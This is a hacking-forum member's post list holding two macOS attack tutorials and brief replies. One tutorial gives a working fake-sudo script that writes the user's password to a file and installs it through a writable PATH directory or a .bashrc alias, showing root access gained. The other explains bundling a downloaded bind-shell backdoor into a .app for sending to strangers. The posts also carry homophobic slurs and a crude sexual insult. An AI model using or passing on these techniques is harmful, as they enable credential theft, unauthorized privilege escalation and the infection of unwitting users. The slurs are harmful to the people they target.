Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Spacetoast

Pages: [1]
1
High Quality Tutorials / Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« on: January 05, 2016, 03:52:46 am »
You're right but I never specified we we're targeting the average user and I never said we weren't. I simply applied a simple quick method to the OSX platform. I can think of several use cases where this would be a viable method but that's not what this article is about. My goal isn't to hold your hand through every possible scenario.

2
High Quality Tutorials / Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« on: December 30, 2015, 07:17:38 am »
Quote from: queryFrequency on December 22, 2015, 10:52:52 pm
Nice quality tutorial, just as high quality as your LSD is.
P.S I'm also a huge homo that loves penises in my mouth.

3
General discussion / Re: What were your Christmas presents?
« on: December 27, 2015, 02:49:16 am »
My family donated 400$ to a charity that provides bikes to families in a 3rd world country. This allows them to cover farther distances faster and with less effort as well as carry more to/from the market, meaning they can earn more money faster. Ohh I also got a hair brush. :)

4
High Quality Tutorials / SSOSXTT II - Ghetto Privilege Escalation on OSX
« on: December 12, 2015, 12:18:52 am »
Spacecow's Stoned OSX Tips & Tricks II

Ghetto Privilege Escalation on OSX

In this tutorial we will be putting an OSX spin on the article Ghetto privilege escalation with bashrc. For this scenario, we have comprimised an OSX host using an advanced version of our l337 .app backdoor and are now trying to gain higher privs by simply stealing the users password. In this case we know our target is a nerd (maybe he was tricked in to running the infected app by a belgian on IRC) and he will eventually run the sudo command in a terminal so that will be our target.


Building our fake psudo prompt:

We will start by getting the output of the sudo binary on OSX when we enter an invalid password.

Code: [Select]
$ sudo ls
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts

Now we will build a quick bash script to mimic this output. Our script will behave a little bit different then the script in the original article except that it will:
  • Only execute once if the output file does not exist already.
  • Fail 3 times to be certain its the right password.
  • Exits with error code 1 on first run.

Code: (bash) [Select]
#!/bin/bash
TARGET="/tmp/$(whoami)-psudo"

if [ ! -f $TARGET ]; then
  for n in 1 2 3; do
    echo -n "Password:"
    stty -echo
    read password
    stty echo
    echo ""
    echo "$(whoami):$password" >> $TARGET
    sleep 1
    echo "Sorry, try again." 1>&2
  done
  echo "sudo: 3 incorrect password attempts"
  exit 1
fi

sudo $*


Execution Method 1: Abusing $PATH:

After writing/copying our script to the target system, we will first check the $PATH variable to see if it has been misconfigured in anyway.

Code: [Select]
$ which sudo
/usr/bin/sudo
$ echo "$PATH"
/Users/Spacecow/.dnx/runtimes/dnx-mono.1.0.0-beta4/bin:/Users/Spacecow/.rbenv/shims:/Users/Spacecow/.rbenv/bin:/usr/local/opt/nvm/v0.10.32/bin:/Users/Spacecow/.bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/lib/node_modules:/usr/local/go/bin

We can see that on my system there are multiple directories in my path before the location of my sudo binary and so we will attempt to move our script to one of these writable directories.

Code: [Select]
$ ls -ld /Users/Spacecow/.bin/
drwxr-xr-x  25 Spacecow  staff  850 Dec 10 16:49 /Users/Spacecow/.bin

Now we simply rename our script to 'sudo', make it executable and wait for the user to run it.

Code: [Select]
$ ls -l /tmp/Spacecow-psudo
ls: /tmp/Spacecow-psudo: No such file or directory
$ sudo su
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
$ cat /tmp/Spacecow-psudo
Spacecow:password
Spacecow:password
Spacecow:password
$ sudo su
Password:
# whoami
root


Execution Method 2: Writing to .bashrc:

If our initial check for a misconfigured $PATH yields no fruit, fear not, we can still resort to writing an alias entry in the users bashrc or zshrc. In this case our script is in /tmp/psudo.

Code: [Select]
$ echo 'alias sudo="/tmp/psudo"' >> ~/.bashrc


Conclusion:

Yet again this is a rather simple method of exploitation but will continue to be a viable attack vector for a while. Dont forget that most of this tutorial is a simple OSX implementation of the original article posted earlier so don't forget to go read it to get the most information out of this post.

Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.

Sincerely yours,
    -Spacecow

5
High Quality Tutorials / SSOSXTT I - Creating a simple python backdoor .app for OSX
« on: December 11, 2015, 09:35:21 pm »
Spacecow's Stoned OSX Tips & Tricks I

Creating a simple python backdoor .app for OSX

In this first tutorial, we will be building a standalone python backdoor in an executable .app format for an OSX target. When complete our app will include a standalone python3.4 interpreter, a simple backdoor and the proper folder hierarchy to turn it in to an App bundle that can be executed.


Requirements:
  • A python script that will create a bind shell.
  • The cookiecutter tool installable from pip.
  • A standalone python interpreter for OSX.

Downloading Required Tools:
First thing we will do is download a simple python shell. In this example we will use a bind shell from https://github.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py which was written by infodox from insecurety.net.

Code: [Select]
$ wget https://raw.githubusercontent.com/Spacecow99/python-pty-shells/master/sctp_pty_bind.py

Our next step is to install cookiecutter from pip. Cookiecutter is a tool from BeeWare used to create project templates for different platforms including OSX, IOS and Android.

Code: [Select]
$ pip install cookiecutter


Creating Our Backdoor:

After this we must create a OSX project by cloning a template repo, in this case from https://github.com/pybee/Python-OSX-template.
When we are prompter for values you are free to set whatever you wish. In the example below, I have already downloaded the template previously so we will be re-cloning it just to show you, as well as leaving all the values their default.

Code: [Select]
$ cookiecutter https://github.com/pybee/Python-OSX-template
You've cloned /Users/user/.cookiecutters/Python-OSX-template before. Is it okay to delete and re-clone it? [yes]: yes
Cloning into 'Python-OSX-template'...
remote: Counting objects: 34, done.
remote: Total 34 (delta 0), reused 0 (delta 0), pack-reused 34
Unpacking objects: 100% (34/34), done.
Checking connectivity... done.
app_name [appname]:
formal_name [App Name]:
bundle [com.example]:
year [2015]:
month [July]:

This will produce an 'App\ Name.app' folder or '[formal_name].app' with the following directory tree:

Code: [Select]
App\ Name.app
└── Contents
       ├── Info.plist
       ├── MacOS
       │    └── App\ Name
       └── Resources/
              ├── app/
              │     └── README
              └── app_packages/
                     └── README

Our application code will go under the app/ directory. The native code will be looking for a appname/__main__.py file as the entry point. We will create a appname directory and paste our backdoor code in to appname/__main__.py.

Code: [Select]
app/
└──appname/
       └──__main__.py

The final step is to add a standalone python interpreter so the app can be run regardless of what python versions are available on the system. We will download our interpreter from https://github.com/pybee/Python-OSX-support/, extract it and copy it to the Resources/ directory.

Code: [Select]
$ pwd
'/Users/user/Programming/App\ Name.app/Contents/Resources/'
$ wget https://github.com/pybee/Python-OSX-support/releases/download/3.4.2-b1/Python-3.4.2-OSX-support.b1.tar.gz
$ tar -xzf Python-3.4.2-OSX-support.b1.tar.gz
$ rm Python-3.4.2-OSX-support.b1.tar.gz


This should leave us with a python/ directory containing a python3.4 binary. And with that we should be ready to start sending our application to random strangers on the internet. It will execute once someone clicks on the App\ Name.app icon and remain in the taskbar while the backdoor is running.


Conclusion:

Now this is a rather simple and easily discoverable attack but the point of this is to demonstrate how simple it is to quickly throw together a backdoor for OSX targets. With a little more thought one can turn this in to a quick and effective attack vector, but that's up to you to think of.

Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.

Sincerely yours,
    -Spacecow

Pages: [1]